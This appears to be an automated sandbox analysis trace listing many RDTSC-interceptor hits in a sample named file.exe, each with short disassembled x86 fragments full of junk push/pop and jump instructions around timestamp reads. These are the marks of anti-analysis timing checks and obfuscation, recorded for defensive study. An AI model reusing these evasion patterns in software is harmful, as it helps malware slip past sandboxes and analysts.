Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DBC276 second address: DBC28C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop esi 0x00000007 pushad 0x00000008 jmp 00007F6969412EAAh 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DBC815 second address: DBC819 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DBC819 second address: DBC82E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 je 00007F6969412EA6h 0x0000000d je 00007F6969412EA6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DBC82E second address: DBC839 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DBC839 second address: DBC83D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DBCB00 second address: DBCB04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DBCF1F second address: DBCF23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DBCF23 second address: DBCF2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DBCF2D second address: DBCF4A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b jmp 00007F6969412EADh 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 pop eax 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DBDE44 second address: DBDE4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC49B7 second address: DC49BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC4403 second address: DC440D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC440D second address: DC4434 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 jmp 00007F6969412EB6h 0x0000000b pop esi 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jp 00007F6969412EA6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC4434 second address: DC4455 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6968D5473Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F6968D5473Eh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC45BD second address: DC45DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 pushad 0x00000007 push ebx 0x00000008 pushad 0x00000009 popad 0x0000000a pop ebx 0x0000000b jne 00007F6969412EACh 0x00000011 push edx 0x00000012 jno 00007F6969412EA6h 0x00000018 pop edx 0x00000019 push esi 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DD3715 second address: DD3719 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DD3719 second address: DD372D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F6969412EAEh 0x0000000c jo 00007F6969412EA6h 0x00000012 push edi 0x00000013 pop edi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DD6EDD second address: DD6EE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DD6EE1 second address: DD6EF7 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F6969412EA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnc 00007F6969412EACh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DDC86F second address: DDC879 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F6968D5473Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DE3D56 second address: DE3D69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F6969412EA6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DE3D69 second address: DE3D6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DE3D6D second address: DE3D96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F6969412EB5h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 pop edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jo 00007F6969412EA6h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DEAD5F second address: DEAD63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DEAEF4 second address: DEAF00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 jl 00007F6969412EA6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DEB506 second address: DEB523 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F6968D54742h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DEFECF second address: DEFEE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jc 00007F6969412EA8h 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DEFEE2 second address: DEFEFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6968D54747h 0x00000009 pop esi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DEFEFE second address: DEFF09 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F6969412EA6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DF1887 second address: DF188D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DF188D second address: DF1892 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DFB022 second address: DFB026 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E028B4 second address: E028BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E028BB second address: E028C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F6968D54736h 0x0000000a popad 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E04196 second address: E0419C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E0419C second address: E041AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnp 00007F6968D54736h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E041AA second address: E041B0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D001A2 second address: D001A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D001A6 second address: D001CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F6969412EB5h 0x0000000d jmp 00007F6969412EAAh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D001CD second address: D001D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E065BF second address: E065C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E065C3 second address: E065E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6968D54747h 0x00000007 jns 00007F6968D54736h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DFFFA0 second address: DFFFA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E153CF second address: E153DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F6968D54736h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E153DB second address: E153F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jbe 00007F6969412EA8h 0x0000000b popad 0x0000000c js 00007F6969412EB2h 0x00000012 push eax 0x00000013 push edx 0x00000014 push edx 0x00000015 pop edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E14F2D second address: E14F4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6968D54746h 0x00000009 popad 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E14F4F second address: E14F53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E14F53 second address: E14F5D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E2F03A second address: E2F056 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6969412EB2h 0x00000009 js 00007F6969412EA6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E2E10C second address: E2E122 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6968D5473Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E2E27A second address: E2E286 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jnp 00007F6969412EA6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E2E286 second address: E2E2A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jno 00007F6968D54736h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007F6968D5473Ch 0x00000012 push edi 0x00000013 pop edi 0x00000014 pop eax 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E2E2A8 second address: E2E2B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push ebx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E2E7CD second address: E2E7D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 push esi 0x00000009 pop esi 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E2ED2A second address: E2ED36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E3063E second address: E30642 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E32EC2 second address: E32ECE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edi 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E32ECE second address: E32ED2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E33223 second address: E3325E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6969412EB7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b pushad 0x0000000c push eax 0x0000000d jg 00007F6969412EA6h 0x00000013 pop eax 0x00000014 push eax 0x00000015 push eax 0x00000016 pop eax 0x00000017 pop eax 0x00000018 popad 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F6969412EAAh 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E3325E second address: E33268 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F6968D54736h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E334DF second address: E334E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E334E3 second address: E334E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E334E9 second address: E334ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E334ED second address: E334F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E36567 second address: E36570 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E36570 second address: E36576 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E36576 second address: E3657A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E3657A second address: E365C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6968D54748h 0x00000007 jmp 00007F6968D54747h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jmp 00007F6968D5473Dh 0x00000013 popad 0x00000014 pushad 0x00000015 pushad 0x00000016 push eax 0x00000017 pop eax 0x00000018 pushad 0x00000019 popad 0x0000001a pushad 0x0000001b popad 0x0000001c popad 0x0000001d push eax 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C30C4D second address: 4C30C7A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F6969412EB1h 0x00000008 pop eax 0x00000009 movsx edi, si 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F6969412EAFh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C70E05 second address: 4C70E2A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, dx 0x00000006 mov ch, dh 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F6968D54742h 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C70E2A second address: 4C70E30 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C70E30 second address: 4C70E7A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6968D5473Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F6968D54746h 0x0000000f mov ebp, esp 0x00000011 pushad 0x00000012 push eax 0x00000013 movsx edi, si 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 call 00007F6968D54745h 0x0000001e pop esi 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C30A1E second address: 4C30A22 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C30A22 second address: 4C30A28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C30A28 second address: 4C30A40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6969412EB4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C30A40 second address: 4C30AB3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6968D5473Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F6968D54744h 0x00000014 xor cx, 1798h 0x00000019 jmp 00007F6968D5473Bh 0x0000001e popfd 0x0000001f mov ecx, 4E00D94Fh 0x00000024 popad 0x00000025 pop ebp 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 pushfd 0x0000002a jmp 00007F6968D54747h 0x0000002f jmp 00007F6968D54743h 0x00000034 popfd 0x00000035 mov ah, 3Eh 0x00000037 popad 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C30616 second address: 4C3061C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C3061C second address: 4C30658 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6968D54744h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F6968D5473Bh 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F6968D54745h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C30658 second address: 4C30675 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6969412EB1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C30675 second address: 4C30679 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C30679 second address: 4C3067F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C30585 second address: 4C305AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, ebx 0x00000005 push ebx 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push edi 0x0000000d jmp 00007F6968D54740h 0x00000012 pop esi 0x00000013 popad 0x00000014 xchg eax, ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C305AB second address: 4C305B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C302A6 second address: 4C302AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C302AA second address: 4C302B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C302B0 second address: 4C302B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, A0h 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C302B7 second address: 4C302D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007F6969412EAAh 0x0000000d xchg eax, ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov esi, edx 0x00000013 push edi 0x00000014 pop ecx 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C302D2 second address: 4C3031E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F6968D54740h 0x00000009 sub eax, 75762B38h 0x0000000f jmp 00007F6968D5473Bh 0x00000014 popfd 0x00000015 mov cx, 1D6Fh 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c mov ebp, esp 0x0000001e pushad 0x0000001f mov ebx, esi 0x00000021 movzx esi, dx 0x00000024 popad 0x00000025 pop ebp 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F6968D54741h 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C3031E second address: 4C30324 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C4001A second address: 4C4005C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6968D54741h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007F6968D54747h 0x00000010 mov ch, 73h 0x00000012 popad 0x00000013 xchg eax, ebp 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F6968D5473Eh 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C4005C second address: 4C40061 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C40061 second address: 4C40085 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ebx, 3CEB8732h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov ebp, esp 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F6968D54744h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C70D3A second address: 4C70D40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C70D40 second address: 4C70D44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
